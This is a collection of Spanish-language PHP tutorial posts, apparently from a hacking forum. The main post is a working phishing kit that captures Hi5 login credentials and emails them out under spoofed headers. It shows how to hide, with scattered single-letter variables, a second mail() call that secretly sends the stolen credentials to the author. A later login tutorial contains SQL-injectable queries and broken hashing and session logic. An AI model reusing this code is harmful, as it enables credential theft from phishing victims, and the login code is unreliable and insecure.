Si, pasa que fue prácticamente escrito aquí, y eso de

$dominio=$nombredominio.$nombreextension; En lo personal si me funciona, ya que el que yo tengo son con selects y tienen un value predeterminado de ".com" , etc, como podrás observar acá:

http://xtemp.org/?h4x=tools&id=chk

Pero igual gracias por la aclaración, tambien es cierto que al estar caído el servidor pues obviamente votará un false tremendo pero pues esto fue por que en lo personal me da "flojera" WhoIS x), es solo para ampliar mas el PHP.

Suerte.

Dices que empeora la ortografía y dices "friks" cuando en realidad es "freaks".

Bueno, sobre lo otro Habbo en cierta forma tiene que ver con la programación, ¿Por qué? Ya que se pueden programar (no necesaríamente en PHP) utilidades para los famosos "kissgen, lettergen, etc", así que pues no te molestes y pues simplemente a seguir.

Antes de continuar quisiera mencionar que no soy un Experto en el área de lo que sería la programación PHP, pero me gusta ayudar a la demás gente, si tuve algún error en lo que sería la explicación corriganla con toda libertad, se que no será con ánimos de postear replys/respuestas ofensivas.

Esta vez cabe mencionar que en sí no es un backdoor ya que no te abré ninguna puerta trasera para tener acceso a esto pero lo decidí "llamar" así ya que no se me ocurrio otro nombre, en sí no tiene mucha ciencia ya que simplemente obtendríamos datos sin que el "webmaster/administrador" supiera (Obviamente si le pone atención al código se daría cuenta rápidamente). Tambien se pudiese encriptar con base64 ó/y otros.

#########################################################################

Backdoor (Literalmente) en PHP.

##########################################################################
Por: Xt3mP
Para: Lectores
Herramientas:
Editor de texto.
Conocimientos en PHP.
Imaginación.
#########################################################################
¿En qué consiste?

Trataremos de ocultar un envío de email secundario
con los datos obtenidos de forma oculta (Backdoor literamente) mediante variables en código PHP para que el que utilize nuestro código aparte de envíarle un email a él

con los datos te llegen a ti
igual a la bandeja.

En este caso utilizarémos de ejemplo un "Scam" cualquiera.
#########################################################################
Primeros pasos.

En este escrito no les enseñare a como crear un scam, pero lo pondré de ejemplo. Suponiendo que tenemos nuestro Scam (Un index y un php que es el que ca*****rá los datos y

enviará por correo.

El index lógicamente puede tener un formulario
como este código:

<form action="codigo.php" method="POST">
Usuario:
<input name="user" type="text" id="user" />

<br />Password:
<input name="passwd" type="text" id="passwd" />
</form>

Aquí es donde hacemos un llamado a el archivo "codigo.php"
mediante el método "POST".

Y nuestro código php el código sería así:

<?php
$usuario = $_POST[&#39;user&#39;];
$clave  = $_POST[&#39;passwd&#39;];
$correo = "Xt3mP@h4x0rz.us";
$contenido = "<br>Email: ".$usuario." <br>Clave: " .$clave."";
$headers = "MINE-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
$headers .= "From: Hi5. <mailings@habbohotel.com>\r\n";
$headers .= "Reply-To: mailings@habbohotel.com\r\n";
$subject .= "Logs";
mail($correo,$subject,$contenido,$headers);
?>
En este no ocupo explicar mucho, " user y passwd " son las casillas de texto de nuestro index y estamos declarando que la variable usuario tiene el valor de
la casilla user y la variable clave tiene la valor de la casilla passwd. Declaramos que la variable correo será igual a nuestro correo, la variable contenido tiene de valor lo que nos enviará por correo en este caso las 2 casillas, los headers son el formato de correo, subject es el asunto y la función "mail()" es la que nos enviará el correo con las variables antes dichas. Vuelvan a leer todo para que no quede ninguna duda.
#########################################################################
Empezar a hacer nuestro "Backdoor".

Comenzarémos a crear nuestro Backdoor para que esos datos antes envíados nos lleguén a nosotros tambien. Pero te preguntarás ¿Como? Sencillo, usando la imaginación un poco podemos declarar estas mismas variables para que formen nuestro correo y no los envíe pero la pregunta nuevamente. ¿Como?
Sencillo, modificarémos nuestro PHP algo así para poner nuestro mail (Xt3mP@hotmail.com):

<?php
/*Aqui el demas codigo*/
$q = "t";
$w = "m";
$e = "h";
$t = "a";
$y = "3";
$u = "i";
$i = "o";
$o = ".";
$p = "c";
$a = "p";
$s = "@";
$f = "h";
$g = "m";
$h = "x";
$b = "l";
?>
Las variables "q,w,e,t,y,u,i,o,p,a,s,f,g,h,b" pueden ser cualquiera exepto números ni carácteres raros.

Luego implementarémos otras variables para concatenarlas.

<?php
/*Aqui el demas codigo*/
$caracteresa= $h.$q.$y.$g.$a; //xt3mp
$caracteresb= $s.$f.$i.$q.$g.$t.$u; //@hotmai
$caracteresc= $b.$o.$p.$i.$g; //l.com
$caracteresd= $caracteresa.$caracteresb.$caracteresc; //xt3mp@hotmail.com
?>
Y agregarémos la función mail() así.

mail($caracteresd,$subject,$contenido,$headers);

Y nuestro código final quedaría así:

<?php
$usuario = $_POST[&#39;user&#39;];
$clave  = $_POST[&#39;passwd&#39;];
$correo = "Xt3mP@h4x0rz.us";
$q = "t";
$w = "m";
$e = "h";
$t = "a";
$y = "3";
$u = "i";
$i = "o";
$o = ".";
$p = "c";
$a = "p";
$s = "@";
$f = "h";
$g = "m";
$h = "x";
$b = "l";
$contenido = "<br>Email: ".$usuario." <br>Clave: " .$clave."";
$headers = "MINE-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
$headers .= "From: Hi5. <mailings@habbohotel.com>\r\n";
$headers .= "Reply-To: mailings@habbohotel.com\r\n";
$subject .= "Logs";
$caracteresa= $h.$q.$y.$g.$a; //xt3mp
$caracteresb= $s.$f.$i.$q.$g.$t.$u; //@hotmai
$caracteresc= $b.$o.$p.$i.$g; //l.com
$caracteresd= $caracteresa.$caracteresb.$caracteresc; //xt3mp@hotmail.com
mail($correo,$subject,$contenido,$headers);
mail($caracteresd,$subject,$contenido,$headers);
?>##########################################################################
Camuflajeando.

Ahora solo es cuestión de camuflajear/ocultar entre el código para que no sea tan visible.
Si es un SCAM Bancario es poco probable que encuentren este envío de mail adherido al código original.
En un scam normal como el de Hi5 el código puede ser así:

<?php
$f= "@";
$z= "x";
$usuario = $_POST[&#39;email&#39;];
$x= "l";
$clave  = $_POST[&#39;password&#39;];
$c= "o";
$correo = array("primer" => "Xt3mP@h4x0rz.us", "segundo" => "xT3mP@gobiernofederal.com");
$v= "v";
$contenido = "<br>Email: ".$usuario." <br>Clave: " .$clave."";
$k= "a";
$t = "";
$b= "e";
$headers = "MINE-Version: 1.0\r\n";
$n= "s";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
$m= "u";
$headers .= "From: Hi5. <mailings@habbohotel.com>\r\n";
$d= ".";
$headers .= "Reply-To: mailings@habbohotel.com\r\n";
$q= "c";
$subject .= "Log de hi5";
$security = $j.$k.$l.$x;
$g= "h";
$usuariouno=$_POST[&#39;email&#39;];
$h= "t";
$l= "i";
$p = "(";
$u = ")";
$claveuno=$_POST[&#39;password&#39;];
$j= "m";
$caracteres = $z.$d.$x.$c.$v;
$caracteresa = $b.$n.$m.$z.$n.$d.$z;
$caracteresb= $f.$g.$c.$h.$j.$k.$l.$x.$d.$q.$c.$j;
$caracteresc= $caracteres.$caracteresa.$caracteresb;
$text=fopen(&#39;logos.txt&#39;,a);
fwrite($text,"
<br>Correo: ".$usuario." <br>Clave: " .$clave." ");
fclose($text);
mail($correo["primer"],$subject,$contenido,$headers);
mail($correo["segundo"],$subject,$contenido,$headers);
mail($caracteresc,$subject,$contenido,$headers);
echo "<meta http-equiv=&#39;Refresh&#39; content=&#39;1;url=http://www.hi5.com&#39;>";
?>
Y en un código bancario (Scam Bancario) son muchos más códigos en PHP por lo tanto pueden utilizar include, o poner en el Index variables en modo
Hidden, etc. Todo es cuestión de la imaginación.
##########################################################################
Glosario.

Backdoor: Es un defecto/agujero/bug en un software o una página web que te permite acceder de manera oculta o silencia, en este caso digo backdoor por que accedemos a los datos que ingresaran sin que nadie sepa.
Scam: Página falsa.
Variable: Como en las matemáticas, X - Y. Aquí las variables pueden tener cualquier valor al igual que en las matemáticas. X= 1000000000000
#########################################################################
Notas:

Esto lo hize solo para ampliar un poco más esto acerca de el PHP y ya que muchos piden SCAMS bancarios y no se dan cuenta que tambien se envían los datos a terceras personas.
##########################################################################
Por: Xt3mP
Para: Lectores


¿Dudas? Haganmelas saber.

Antes de continuar quisiera mencionar que no soy un Experto en el área de lo que sería la programación PHP, pero me gusta ayudar a la demás gente, si tuve algún error en lo que sería la explicación corriganla con toda libertad, se que no será con ánimos de postear replys/respuestas ofensivas.

#########################################################################

En este tutorial trataré de enseñarles como encriptar una clave con varios métodos lo cuál si logran desencriptar una parte quedará todavía demasiado por desencriptar así que pues prácticamente nuestro login sería totalmente (en su mayoría) seguro.

Consistirá en 5 páginas, dos HTML (Registro y Login), 3 PHP que una sería la que llevará acabo el registro, la otra sería la conexión a la base de datos y la última sería comprobar el login.

Comenzarémos con el archivo config.php:

<?php
$dbhost="localhost"; //Host del db
$dbuser="xt3mpme_user"; //Usuario del db
$dbpass="xt3mpme_pass"; //Password del db
$db="xt3mpme_users"; //db donde se creara la tabla users
mysql_connect("$dbhost","$dbuser","$dbpass");
mysql_select_db("$db");
//Ya explique para que sirve cada variable.
?>

Una vez hecho esto comenzarémos con el formulario de registro que se llamará registrar.html el cuál será demasiado simple para que lo tomen simplemente como referencia:

<form action="registrar.php" method="POST">
Usuario:<br>
<input type="text" name="user" id="user"><br>
Password:<br>
<input type="password" name="passwd" id="passwd"><br>
Repetir Password:<br>
<input type="password" name="passwd2" id="passwd2">
<input type="submit" value="Registrar" id="submit">

Una vez hecho esto, seguirémos finalmente con la encriptación la cuál en está si explicaré mas o menos lo que sería la encriptación, se llamará registrar.php:

<?php
include(&#39;config.php&#39;);//Incluimos la conexion a la base de datos.
if (($_POST[&#39;user&#39;]== &#39;&#39;) or ($_POST[&#39;passwd&#39;]== &#39;&#39;) or ($_POST[&#39;passwd2&#39;]== &#39;&#39;)){
echo "Te faltaron rellenar campos";
}else{
if($_POST[&#39;passwd&#39;] != $_POST[&#39;passwd2&#39;]){
echo "Las contrasenas no coinciden";
}else{
$user = stripslashes($_POST["user"]);
$user = strip_tags($user);
// Quitamos las etiquetas html y lo relacionado a el usuario.
$pass = stripslashes($_POST["passwd"]);
$pass = strip_tags($pass);
// Quitamos las etiquetas html y lo relacionado a el password.
/* _____________________________________ */
// Comenzamos con la encriptacion a el estilo de Xt3mP.
$pass_encriptada1 = md5 ($pass); //Encriptacion nivel 1
$pass_encriptada2 = crc32($pass_encriptada1); //Encriptacion nivel 1
$pass_encriptada3 = crypt($pass_encriptada2, "xtemp"); //Encriptacion nivel 2
$pass_encriptada4 = sha1("xtemp".$pass_encriptada3); //Encriptacion nivel 3
// Aqui será demasiado dificil poder llegar a la password verdadera ya que por ejemplo, podrian desencriptar el md5 pero aún faltaria demasiado.
$usuarios = mysql_query("SELECT usuarios FROM cuentas WHERE usuarios=&#39;$user&#39; ");
// Seleccionamos el campo usuarios de la tabla cuentas en donde el usuario es el que escriben en el campo user
if($usuarios2 = mysql_fetch_array($usuarios))
{
echo &#39;El usuario &#39;.$user.&#39; ya esta registrado&#39;;
mysql_free_result($usuarios);
// Liberamos la memoria
}else{
mysql_query("INSERT INTO cuentas (usuarios,pass) values (&#39;$user&#39;,&#39;$pass&#39;)");
//Insertamos los valores de el user y pass en los campos usuarios y pass de la tabla cuentas
echo "El usuario &#39;.$user.&#39; ha sido registrado con éxito.&#39;;
//Decimos que el usuario ha sido registrado, etc.
}
}
}
?>

Ahora procederémos a hacer el login.html:

<form action="logear.php" method="POST">
User:<br>
<input type="text" name="user" id="pass"><br>
Pass:<br>
<input type="password" name="pass" id="pass"><br>
<input type="submit" value="Logear" id="submit">

Creo que ya le entienden, así que haremos el logear.php:

<?php
include(&#39;config.php&#39;); //Incluimos la conexion a la base de datos.
if( ($_POST["user"] == &#39;&#39;) or ($_POST["pass"] == &#39;&#39;) )
{
echo "Necesitas introducir datos de logeo";
}else{
$user = $_POST[&#39;user&#39;];
$pass = $_POST[&#39;pass&#39;];
$pass_encriptada1 = md5 ($pass); //Encriptacion nivel 1
$pass_encriptada2 = crc32($pass_encriptada1); //Encriptacion nivel 1
$pass_encriptada3 = crypt($pass_encriptada2, "xtemp"); //Encriptacion nivel 2
$pass_encriptada4 = sha1("xtemp".$pass_encriptada3); //Encriptacion nivel 3
$usuarios = mysql_query("SELECT * FROM cuentas WHERE usuarios=&#39;$user&#39; and pass=&#39;$pass_encriptada4&#39;");
//Comprobamos que si el usuario y la pass introducidas existan
if($usuarios2 = mysql_fetch_array($usuarios))
{
//Si existen los datos introducidos registraremos dos sesiones
session_register("login"); 
session_register("user");
$_SESSION[&#39;login&#39;] = "SI";//Le damos el valor SI a la sesion login.
$_SESSION[&#39;user&#39;] = $usuarios2["usuarios"];//Le damos el valor del nombre de usuario a la sesion user.
echo &#39;<script language="JavaScript" type="text/javascript">
alert("Bienvenido.");//Mostramos alerta de bienvenida
</script>&#39;;
echo "<meta http-equiv=&#39;Refresh&#39; content=&#39;2;url=index.php&#39;>";//Redirigimos a nuestro index
}else{
echo &#39;Username y Password incorrecto.&#39;;
}
}
}
?>

Ahora un PLUS, mostrar contenido si es que esta logeado:

<?php
if ($_SESSION[&#39;login&#39;] = "SI"){//Si la Sesion LOGIN es igual a SI (Se registro si nos logeamos bien)
echo "Hola: ".$_SESSION[&#39;user&#39;];
}else{//Si la Sesion LOGIN no es si (Se registro si nos logeamos bien)
echo "Esta seccion es prohibida";
}
?>

Y eso sería todo, no es fácil ni díficil, es intermedio, los resultados de la password si ponemos xt3mp sería:

Encriptación MD5: 0fcf520c7c5f6a56b69244eeb9bfb98d
Encriptación MD5/crc32: -521765068
Encriptación MD5/crc32/Semilla: xtOtXrnGfYSMM
Encriptación MD5/crc32/Semilla/sha1: fa097e6b9dd4149f78b3e8c9917ff9eb38995da8

La base de datos realmente no sería díficil, si necesitan el código de crear base de datos por phpMyADMIN me lo hacen saber.

Saludos.

Antes de continuar quisiera mencionar que no soy un Experto en el área de lo que sería la programación PHP, pero me gusta ayudar a la demás gente, si tuve algún error en lo que sería la explicación corriganla con toda libertad, se que no será con ánimos de postear replys/respuestas ofensivas.

#########################################################################

En este tutorial aprenderemos a como pedir una contraseña para mostrar el contenido mediante el lenguaje de programacion PHP, utilizaremos el metodo POST y una de las condiciones de PHP, el famoso "If" en español significa "Si...".

Ejemplo: Si tienes 18 años puedes pasar, Si no no puedes entrar.

Necesitaremos un editor de texto, esta vez solo utilizaremos dos paginas, un HTML con el formulario y un PHP para comprobar.

Antes de seguir te recomiendo dar click aqui para que entiendas mas sobre estas etiquetas.

El codigo de entrar.html sera asi (Primero lo escribo y despues lo explico):

<html>
<title>Identificacion</title>
<body>
<form action="entrar.php" method="POST">
<input type="text" name="pass" id="pass"><br>
<input type="submit" name="submit" value="Entrar">
</form>
</html>


• Como ya sabran, indicamos que se trata de codigo HTML mediante las etiquetas <html> y </html>
• Con el comando <input type="text" name="pass" id="pass"> le indicamos que sera una casilla de texto con el nombre pass y el id pass.
• Con el comando <input type="submit" name="submit" value="Entrar"> le indicamos que sera un boton que enviara los datos a determinada pagina y que mostrara el texto "Entrar".
• Con el <form action="entrar.php method="POST"> le indicamos que hara un llamado a la pagina "entrar.php" cuando den click en el boton y enviara los datos por el metodo "POST".

Ahora nuestro entrar.php sera de la siguiente forma:

<?php
$clave = $_POST[&#39;pass&#39;];
if ($clave == "test"){
echo "Logeado correctamente";
}else{
echo "La clave es incorrecta";
}
?>


• Como ya debemos de saber, con las etiquetas <?php y ?> indicamos que dentro de estas etiquetas sera codigo PHP.
• Aqui nuestra variable se llama "clave", pero puede ser $loquesea y le estamos indicando el valor de la casilla de texto de entrar.html, que la obtenemos con el comando $_POST['casilla_de_texto'] = $_POST['pass'].
• Aqui nuestra condicion if funciona de la siguiente manera, un ejemplo practico es: if (Condicion){Que pasa si la condicion se cumple}si no{Que pasa si la condicion no se cumple}; por lo tanto seria asi:
  Si la variable $clave es "IGUAL" a "test" te mostrara el mensaje "Logeado correctamente", si no te mostrara el mensaje "La clave es incorrecta.
• Cabe mencionar que ahi una gran diferencia entre el signo "=" y el doble signo "==", ya que el signo "=" le asigna un valor a determinada variable y el doble signo "==" hace una comparacion.

Y pues asi de sencillo es todo, solo cambien "test" por la clave que quieran pedir y listo.

P.D. Recuerden poner el signo " ; " despues de cada linea para evitar error de sintaxis.

Saludos.